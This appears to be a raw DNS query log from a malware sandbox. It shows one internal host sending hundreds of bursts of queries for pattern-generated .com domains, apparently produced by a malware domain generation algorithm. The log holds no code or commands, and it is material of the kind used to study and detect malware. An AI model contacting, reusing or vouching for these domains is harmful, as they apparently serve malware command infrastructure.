                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446090937 CEST192.168.2.41.1.1.10x4158Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446290970 CEST192.168.2.41.1.1.10x2525Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446466923 CEST192.168.2.41.1.1.10xa785Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446748972 CEST192.168.2.41.1.1.10xdabStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446974993 CEST192.168.2.41.1.1.10x85d5Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.447137117 CEST192.168.2.41.1.1.10x1825Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.447303057 CEST192.168.2.41.1.1.10xe650Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.448765993 CEST192.168.2.41.1.1.10xdc27Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.449157000 CEST192.168.2.41.1.1.10x9c80Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451003075 CEST192.168.2.41.1.1.10x47bbStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451359987 CEST192.168.2.41.1.1.10x5980Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451738119 CEST192.168.2.41.1.1.10x7da5Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.452965021 CEST192.168.2.41.1.1.10xf73cStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.005652905 CEST192.168.2.41.1.1.10x7e00Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.005697966 CEST192.168.2.41.1.1.10xd312Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.036871910 CEST192.168.2.41.1.1.10x4a0dStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.037115097 CEST192.168.2.41.1.1.10xf0fStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.037168980 CEST192.168.2.41.1.1.10x43Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068929911 CEST192.168.2.41.1.1.10x12f4Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068963051 CEST192.168.2.41.1.1.10x931cStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068994999 CEST192.168.2.41.1.1.10x4d5fStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069335938 CEST192.168.2.41.1.1.10xf671Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.135119915 CEST192.168.2.41.1.1.10xb231Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.302848101 CEST192.168.2.41.1.1.10x98c9Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.443065882 CEST192.168.2.41.1.1.10x19a0Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.065428019 CEST192.168.2.41.1.1.10x2beeStandard query (0)ww1.lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500469923 CEST192.168.2.41.1.1.10xa74bStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500570059 CEST192.168.2.41.1.1.10xf415Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500663996 CEST192.168.2.41.1.1.10x8a1aStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500782013 CEST192.168.2.41.1.1.10xd98dStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.547883034 CEST192.168.2.41.1.1.10x200Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.553045034 CEST192.168.2.41.1.1.10x92ddStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.594664097 CEST192.168.2.41.1.1.10xe7c4Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.610730886 CEST192.168.2.41.1.1.10xffbcStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.611857891 CEST192.168.2.41.1.1.10xd989Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.629679918 CEST192.168.2.41.1.1.10xd76bStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.786416054 CEST192.168.2.41.1.1.10xe8d7Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.788228989 CEST192.168.2.41.1.1.10x5939Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.809535027 CEST192.168.2.41.1.1.10xdf95Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.810296059 CEST192.168.2.41.1.1.10x789fStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.810656071 CEST192.168.2.41.1.1.10xb854Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.811458111 CEST192.168.2.41.1.1.10xc8c0Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812057018 CEST192.168.2.41.1.1.10x400fStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812418938 CEST192.168.2.41.1.1.10x14dStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812649965 CEST192.168.2.41.1.1.10x370fStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812741995 CEST192.168.2.41.1.1.10xe1e9Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.818890095 CEST192.168.2.41.1.1.10x437fStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.836227894 CEST192.168.2.41.1.1.10x40dcStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.837300062 CEST192.168.2.41.1.1.10xd7b9Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.837538958 CEST192.168.2.41.1.1.10x2c29Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.838946104 CEST192.168.2.41.1.1.10x6e73Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839154959 CEST192.168.2.41.1.1.10x3d9eStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839468002 CEST192.168.2.41.1.1.10x81bbStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839636087 CEST192.168.2.41.1.1.10xe25fStandard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839782953 CEST192.168.2.41.1.1.10xdb69Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.857125998 CEST192.168.2.41.1.1.10xcdecStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.858899117 CEST192.168.2.41.1.1.10xff5aStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.858994007 CEST192.168.2.41.1.1.10xa0a2Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859114885 CEST192.168.2.41.1.1.10x622dStandard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859230042 CEST192.168.2.41.1.1.10x90e6Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859301090 CEST192.168.2.41.1.1.10x460eStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859405041 CEST192.168.2.41.1.1.10x2af4Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859519005 CEST192.168.2.41.1.1.10xa854Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859608889 CEST192.168.2.41.1.1.10x9ebfStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.860189915 CEST192.168.2.41.1.1.10xec81Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.864561081 CEST192.168.2.41.1.1.10xec52Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.864823103 CEST192.168.2.41.1.1.10xf7d9Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.864995003 CEST192.168.2.41.1.1.10x192aStandard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.872850895 CEST192.168.2.41.1.1.10xe980Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.874397039 CEST192.168.2.41.1.1.10xd47bStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.892587900 CEST192.168.2.41.1.1.10xc64fStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.894293070 CEST192.168.2.41.1.1.10xbe56Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.894470930 CEST192.168.2.41.1.1.10x217cStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.897924900 CEST192.168.2.41.1.1.10xf72fStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898101091 CEST192.168.2.41.1.1.10xe8daStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898303986 CEST192.168.2.41.1.1.10x5a32Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898463011 CEST192.168.2.41.1.1.10x1e9dStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898474932 CEST192.168.2.41.1.1.10xe2e3Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898685932 CEST192.168.2.41.1.1.10xbd86Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898685932 CEST192.168.2.41.1.1.10x4afbStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898885012 CEST192.168.2.41.1.1.10x1e73Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.898897886 CEST192.168.2.41.1.1.10xb99cStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.899075031 CEST192.168.2.41.1.1.10x6dc9Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.900691032 CEST192.168.2.41.1.1.10x9a88Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.901428938 CEST192.168.2.41.1.1.10x423bStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.901606083 CEST192.168.2.41.1.1.10x176aStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.901789904 CEST192.168.2.41.1.1.10x941fStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.907092094 CEST192.168.2.41.1.1.10x1a6bStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.910131931 CEST192.168.2.41.1.1.10xa2bStandard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.910162926 CEST192.168.2.41.1.1.10x8937Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.337016106 CEST192.168.2.41.1.1.10x93baStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.343899965 CEST192.168.2.41.1.1.10x2b05Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.345613956 CEST192.168.2.41.1.1.10xb19Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.345753908 CEST192.168.2.41.1.1.10xc1feStandard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.353956938 CEST192.168.2.41.1.1.10xb4bcStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.356506109 CEST192.168.2.41.1.1.10x65c0Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.356725931 CEST192.168.2.41.1.1.10x8e4eStandard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.364772081 CEST192.168.2.41.1.1.10x4d4dStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.365401983 CEST192.168.2.41.1.1.10xad52Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.374172926 CEST192.168.2.41.1.1.10x3d69Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.383243084 CEST192.168.2.41.1.1.10xb0c2Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.385737896 CEST192.168.2.41.1.1.10x6bf6Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.389379025 CEST192.168.2.41.1.1.10x2f78Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.390129089 CEST192.168.2.41.1.1.10x37d2Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.393608093 CEST192.168.2.41.1.1.10x21d8Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.393935919 CEST192.168.2.41.1.1.10xeefbStandard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.394731998 CEST192.168.2.41.1.1.10xaf6eStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.395819902 CEST192.168.2.41.1.1.10x209fStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.396822929 CEST192.168.2.41.1.1.10xb99cStandard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.397891998 CEST192.168.2.41.1.1.10xe00cStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.398500919 CEST192.168.2.41.1.1.10xdd0fStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.398924112 CEST192.168.2.41.1.1.10x8d27Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.399209976 CEST192.168.2.41.1.1.10x9f49Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.400619984 CEST192.168.2.41.1.1.10x1a2Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.400813103 CEST192.168.2.41.1.1.10xbae1Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.401282072 CEST192.168.2.41.1.1.10xba23Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.401475906 CEST192.168.2.41.1.1.10xfb8fStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.401946068 CEST192.168.2.41.1.1.10xcb6cStandard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.404341936 CEST192.168.2.41.1.1.10x3581Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.404560089 CEST192.168.2.41.1.1.10xe7a4Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.404750109 CEST192.168.2.41.1.1.10x58cdStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.404980898 CEST192.168.2.41.1.1.10x7628Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.406330109 CEST192.168.2.41.1.1.10x6e9eStandard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.407306910 CEST192.168.2.41.1.1.10xeb8eStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.407691956 CEST192.168.2.41.1.1.10xa02fStandard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.407896996 CEST192.168.2.41.1.1.10x72dStandard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.411180973 CEST192.168.2.41.1.1.10xcbadStandard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.413050890 CEST192.168.2.41.1.1.10x5da0Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.414951086 CEST192.168.2.41.1.1.10x2aecStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.416169882 CEST192.168.2.41.1.1.10x70Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.416380882 CEST192.168.2.41.1.1.10x7b6fStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420053959 CEST192.168.2.41.1.1.10x2419Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420634985 CEST192.168.2.41.1.1.10xe3f9Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420836926 CEST192.168.2.41.1.1.10xc3c2Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.421789885 CEST192.168.2.41.1.1.10x4bb6Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.423681974 CEST192.168.2.41.1.1.10x7698Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.423959017 CEST192.168.2.41.1.1.10xe25Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.424742937 CEST192.168.2.41.1.1.10x7dc7Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.425144911 CEST192.168.2.41.1.1.10x82ccStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.425365925 CEST192.168.2.41.1.1.10xef4cStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.426883936 CEST192.168.2.41.1.1.10xd34Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.428004980 CEST192.168.2.41.1.1.10x92eaStandard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.429222107 CEST192.168.2.41.1.1.10x1fb5Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.435343027 CEST192.168.2.41.1.1.10x5563Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.435970068 CEST192.168.2.41.1.1.10x1461Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.442187071 CEST192.168.2.41.1.1.10xe75fStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.444166899 CEST192.168.2.41.1.1.10xd20fStandard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.457856894 CEST192.168.2.41.1.1.10x15d9Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458071947 CEST192.168.2.41.1.1.10xa7f8Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458236933 CEST192.168.2.41.1.1.10x313cStandard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458401918 CEST192.168.2.41.1.1.10xf9cdStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.459203005 CEST192.168.2.41.1.1.10x8a74Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.459798098 CEST192.168.2.41.1.1.10x658fStandard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.460180044 CEST192.168.2.41.1.1.10x5baeStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.582227945 CEST192.168.2.41.1.1.10xc091Standard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.597652912 CEST192.168.2.41.1.1.10x5c2aStandard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.651922941 CEST192.168.2.41.1.1.10xbd53Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.655003071 CEST192.168.2.41.1.1.10x63dStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.656291008 CEST192.168.2.41.1.1.10x2912Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.660410881 CEST192.168.2.41.1.1.10xe516Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.688913107 CEST192.168.2.41.1.1.10x4224Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.690489054 CEST192.168.2.41.1.1.10x4cbdStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.693324089 CEST192.168.2.41.1.1.10x6b47Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.693837881 CEST192.168.2.41.1.1.10x7a85Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.695945978 CEST192.168.2.41.1.1.10xec87Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.696516991 CEST192.168.2.41.1.1.10xe39aStandard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.697187901 CEST192.168.2.41.1.1.10xb45Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.697751045 CEST192.168.2.41.1.1.10x8d5eStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.698508978 CEST192.168.2.41.1.1.10x279dStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.698987007 CEST192.168.2.41.1.1.10xfb21Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.699974060 CEST192.168.2.41.1.1.10x2677Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.701978922 CEST192.168.2.41.1.1.10x4172Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.702414036 CEST192.168.2.41.1.1.10xea24Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.703176975 CEST192.168.2.41.1.1.10x1aceStandard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.704232931 CEST192.168.2.41.1.1.10x7e0eStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.735728979 CEST192.168.2.41.1.1.10x7deStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.736076117 CEST192.168.2.41.1.1.10x9ad5Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.773019075 CEST192.168.2.41.1.1.10x6ddcStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.773489952 CEST192.168.2.41.1.1.10xf9a3Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.775496960 CEST192.168.2.41.1.1.10x8362Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.782902956 CEST192.168.2.41.1.1.10xa2b1Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
